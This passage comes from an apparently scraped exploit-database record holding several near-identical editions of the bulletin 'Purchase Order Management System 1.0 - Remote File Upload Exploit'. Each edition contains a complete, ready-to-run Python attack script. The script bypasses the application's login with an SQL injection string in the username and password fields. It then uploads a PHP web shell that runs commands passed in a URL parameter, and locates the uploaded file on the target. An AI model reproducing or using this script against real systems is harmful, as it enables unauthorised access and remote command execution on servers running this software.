deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-24] #"}, "lastseen": "2021-09-23T22:34:09", "differentElements": ["sourceData"], "edition": 9}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "9023aee593c018754f2d533b7e0fefc9", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-25T00:40:45", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-25] #"}, "lastseen": "2021-09-25T00:40:45", "differentElements": ["sourceData"], "edition": 10}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "a828064860f01f82f644e7ddd35879e0", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-25T22:32:17", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-26] #"}, "lastseen": "2021-09-25T22:32:17", "differentElements": ["sourceData"], "edition": 11}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "d3f932693e936dc0133a565bee1fcb52", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-26T22:38:12", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-27] #"}, "lastseen": "2021-09-26T22:38:12", "differentElements": ["sourceData"], "edition": 12}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "f1869c34528097dbb078695e2df9053e", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-28T06:38:35", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-28] #"}, "lastseen": "2021-09-28T06:38:35", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "fb7a92f37f680af166bd051a1404b1d3", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-28T22:39:44", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-29] #"}, "lastseen": "2021-09-28T22:39:44", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "0f53a7a11e35f8c1333ddb244e82980f", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-29T22:42:49", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: 